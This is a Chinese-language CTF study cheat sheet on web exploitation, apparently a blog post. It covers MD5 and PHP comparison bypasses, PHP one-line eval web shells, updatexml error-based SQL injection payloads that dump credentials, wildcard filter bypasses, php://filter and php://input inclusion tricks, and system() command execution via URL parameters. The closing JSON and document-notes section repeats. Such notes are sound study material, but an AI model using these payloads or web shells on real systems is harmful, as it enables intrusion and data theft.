CTF知识点

md5函数

<?php
    $a = '123';
    echo md5($a,true);
?>
括号中true显示输出二进制
替换成false显示输出十六进制

绕过

ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c，这个字符串前几位刚好是 ' or '6 而 Mysql 刚好又会把 hex 转成 ascii 解释，因此拼接之后的形式是 select * from 'admin' where password='' or '6xxxxx'，等价于 or 一个永真式，因此相当于万能密码，可以绕过md5()函数。

弱类型比较

两个数的md5加密后值0e开头就可以绕过，因为php在进行弱类型比较时，会转换字符串类型，再进行比较
两个数都以0e开头会被认为科学计数法，0e后面加任何数再科学计数法中都是0，所以两数相等
var_dump("0e12345"=="0e66666");//true
var_dump(md5('240610708')==md5('QNKCDZO'));//true

强类型比较

if(md5((string)$_GET['a'])===md5((string)$_GET['b']))
{<!-- -->
    var_dump($flag);
}

此时两个md5后的值采用严格比较，没有规定字符串如果这个时候传入的是数组不是字符串，可以利用md5()函数的缺陷进行绕过
var_dump(md5([1,2,3])==md5([4,5,6]));//true

var_dump(md5($_GET['a'])==md5($_GET['b']));
?a[]=1&b[]=1//true
数值类型加密位null

进制

DEC 十进制

HEX 十六进制

BIN 二进制

OCT 八进制

木马

常用一句话

<?php @eval($_GET['cmd']); ?>
<?php @eval($_POST['cmd']); ?>
<?php @eval($_REQUEST['cmd']); ?>

<script language="php">eval($_GET['cmd']);</script>
<script language="php">eval($_POST['cmd']);</script>

GIF89a（GIF16进制的ASCII值）

文件头

FF D8 FF E1                   GPEG(jpg)
89 50 4E 47                   PNG(png)
47 49 46 38                   GIF(gif)
49 49 2A 00                   TIFF(tif)
42 4D C0 01                   Windows  Bitmap(bmp)
50 4B 03 04                   ZIP Archive (zip)
52 61 72 21                   RAR Archive (rar)
38 42 50 53                   Adobe Photoshop (psd)
7B 5C 72 74 66                Rich Text Format (rtf)
3C 3F 78 6D 6C                XML(xml)
68 74 6D 6C 3E                HTML (html)
25 50 44 46 2D 31 2E          Adobe Acrobat (pdf)
57 41 56 45                   Wave (wav)
4D 3C 2B 1A                   pcap (pcap)
52 49 46 46                   WEBP(webp)

MIME语法

通用结构：type/subtype

type：表示多个子类的独立类别

subtype：表示细分后的类型

对大小写不敏感，传统都是小写

常用MIME类型

文件类型	MIME类型	描述
.jpg | .jpeg	image/jpeg	使用图像公共图像格式
.png	image/png
.bin	application/octet-stream	当消息是未知类型和包含任何字节数据时使用

SQL注入

堆叠注入中后端代码猜测

*,1

报错注入：

1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#

1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))#

1'or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))#

1'or(updatexml(1,concat(0x7e,(select(right(password,25))from(H4rDsq1)),0x7e),1))#

PHP

error_reporting(0)：错误报告等级，参数为0表示关闭所有错误报告
class 定义类 public 定义公共属性 
preg_match 正则表达

php短标签
<?= ?>相当于<?php echo ...?> 例：<?='hello'?> //输出'hello'
php反引号 
可以直接执行系统命令，想输出执行结果还需要echo等函数
<?php echo `ls /`;?>  		 				还可以使用短标签<?='ls /'?>

php5和php7的区别

在 PHP 5 中，assert()是一个函数，我们可以用$_=assert;$_()这样的形式来实现代码的动态执行。但是在 PHP 7 中，assert()变成了一个和eval()一样的语言结构，不再支持上面那种调用方法。（但是好像在 PHP 7.0.12 下还能这样调用）

PHP5中，是不支持($a)()这种调用方法的，但在 PHP 7 中支持这种调用方法，因此支持这么写('phpinfo')();

通配符在RCE中的利用

原理

在正则表达式中，?这样的通配符与其它字符一起组合成表达式，匹配前面的字符或表达式零次或一次。
在 Shell 命令行中，?这样的通配符与其它字符一起组合成表达式，匹配任意一个字符。
同理，我们可以知道*通配符：
在正则表达式中，*这样的通配符与其它字符一起组合成表达式，匹配前面的字符或表达式零次或多次。
在shell命令行中，*这样的通配符与其它字符一起组合成表达式，匹配任意长度的字符串。这个字符串的长度可以是0，可以是1，可以是任意数字。

利用?和*在正则表达式和 Shell 命令行中的区别，可以绕过关键字过滤

假设flag在/flag中:
cat /fla?
cat /fla*

假设flag在/flag.txt中:
cat /fla????
cat /fla*

假设flag在/flags/flag.txt中:
cat /fla??/fla????
cat /fla*/fla*

假设flag在flagg文件加里:
cat /?????/fla?
cat /?????/fla*

Python转换交互式

python -c 'import pty;pty.spawn("/bin/bash")'

ssh登录

ssh -p xx [user@ip](mailto:user@ip)

xx 为 端口号   user为用户名  ip为要登陆的ip

状态码

200  OK
　　　　表示请求被服务器正常处理 

302  Found 
　　　　临时重定向，表示请求的资源临时搬到了其他位置 

304  Not Modified 
　　　　表示客户端发送附带条件的请求时，条件不满足 

400  Bad Request 
　　　　表示请求报文存在语法错误或参数错误，服务器不理解 

403  Forbidden 
　　　　表示对请求资源的访问被服务器拒绝了 

404  Not Found  
　　　　表示服务器找不到你请求的资源

500 Internal Server Error  
　　　　表示服务器执行请求的时候出错了

反序列化

常见的几个魔法函数:
__construct： 在创建对象时候初始化对象，一般用于对变量赋初值

__destruct： 和构造函数相反，当对象所在函数调用完毕后执行

__toString：当对象被当做一个字符串使用时调用

__sleep：序列化对象之前就调用此方法(其返回需要一个数组)

__wakeup：反序列化恢复对象之前调用该方法 优先调用，而不会调用_construct
绕过：序列化字符串中表示对象属性个数的值大于真实属性个数时，就会跳过_wakeup执行

__call：当调用对象中不存在的方法会自动调用该方法

__get：在调用私有属性的时候会自动执行

__isset()：在不可访问的属性上调用isset()或empty()触发

__unset()：在不可访问的属性上使用unset()时触发

文件包含漏洞

include： 包含并运行指定文件，当包含外部文件发生错误时，系统给出警告，但整个php文件继续执行
include_once： 这个函数跟和include语句类似，唯一区别是如果该文件中已经被包含过，则不会再次包含

require： 跟include唯一不同的是，当产生错误时候，整个php文件停止运行
require_once： require_once语句和require 语句完全相同，唯一区别是PHP会检查该文件是否已经被包含过，如果是则不会再次包含

注：这四个函数不管执行哪个后缀的文件，都将他当作php文件执行

远程文件包含

allow_url_fopen = On(是否允许打开远程文件) allow_url_include = On(是否允许include/require远程文件)
分为 无绕过 ?绕过 #绕过  空格绕过
    
data:// 本身是数据流封装器，原理用法和php://input类似，但是是发送get请求参数
例http://ip/test.php?a=data://text/plain,条件

php伪协议

php://filter
?file=php://filter/convert.base64-encode/resource=xx.php
?file=php://filter/read=convert.base64-encode/resource=xx.php

若base被过滤，utf编码：
?file=php://filter/convert.iconv.utf8.utf16/resource=xx.php 

php://input 条件：allow_url_include=On 实际相当于远程包含利用
php://打开交流文件后，我们直接在流里面写入我们的恶意代码，此时包含可执行文件
例：http://ip/test.php?a=php://input //然后在post里传入所需条件

windows常用命令

netstat -ano  查看系统进程

tasklist 列出任务及进程号

taskkill 杀进程

type 查看文件 类似于linux中cat

md 创建文件夹 类似于linux中mkdir

tree 查看目录结构

tracert 路由跟踪

cls 清空命令行 类似于linux中clear

linux常用命令

ls -a 查看所有文件，包括隐藏文件

echo 输入什么就打印什么

> 覆盖 常见用法 echo word > test.txt 

>> 追加 常见用法 echo word >> test.txt 

find 目录 -name 文件 查找指定文件

grep 参数 目标 

id 显示用户id 所属群id

netstat 网络状态 
-anplt 查看所有tcp端口
-anplu 查看所有udp端口

uname 显示系统信息
-a 显示系统详细信息

--help 命令使用详情

clear 清空命令行

touch 创建文件

mkdir 创建目录

chmod 权限 文件所有者 文件所属组 其他用户 读4 写2 执行1

scp 复制文件和目录

url使用linux命令

?url=system("ls /");注意：ls后面要有一个空格，然后一个分号结束，这不就出来了flag

?url=system("cat /f*");

?url=system("cat /flllllaaaaaaggggggg");

常见端口

数据库	端口号
Oracle	1521
Mysql	3306
Sql server	1433
Redis	6379
PostgreSQL	5432
MongoDB	27017
DB2	50000

服务	端口号
FTP 数据传输 控制链接	20 21
ssh	22
telnet	23
SMTP 简单邮件传输	25
DNS域名解析	53
Http代理	80

常见备份文件名

.git
.svn
.swp
.~
.bak
.bash_history

json对象

存储数据的方式，使用键值对的形式表示数据

JSON对象的语法规则如下：

使用花括号 {} 表示一个JSON对象。
键和值之间使用冒号 : 分隔。
每个键值对之间使用逗号 , 分隔。
键必须是一个字符串，需要用双引号或单引号括起来。
值可以是字符串、数字、布尔值、数组、嵌套的JSON对象或null。

下面是json对象实例

{
   "name": "John",
   "age": 30,
   "isStudent": false,
   "interests": ["reading", "traveling"],
   "address": {
      "city": "New York",
      "country": "USA"
   },
   "phoneNumber": null

在上面的示例中，name、age、isStudent、address、phoneNumber都是键，对应的值分别是字符串、数字、布尔值、嵌套的JSON对象、null。

你可以使用各种编程语言（如JavaScript、Python、PHP等）来创建、访问和操作JSON对象。

例：[SWPUCTF 2021 新生赛]jicao

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

get传入?json={“x”:“wllm”}

post传入id=wllmNB

word pdf 文档知识点

word中document.xml文件是所有文字存贮的地方 查找pass

PDF隐写 wbStego4open

PPT 打开时纯色图片 猜是彩虹 红橙黄绿青蓝紫 对应0-6 白色面板是分割

问和操作JSON对象。

例：[SWPUCTF 2021 新生赛]jicao

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

get传入?json={“x”:“wllm”}

post传入id=wllmNB

[外链图片转存中…(img-pJOVzMpV-1720191316208)]

word pdf 文档知识点

word中document.xml文件是所有文字存贮的地方 查找pass

PDF隐写 wbStego4open

PPT 打开时纯色图片 猜是彩虹 红橙黄绿青蓝紫 对应0-6 白色面板是分割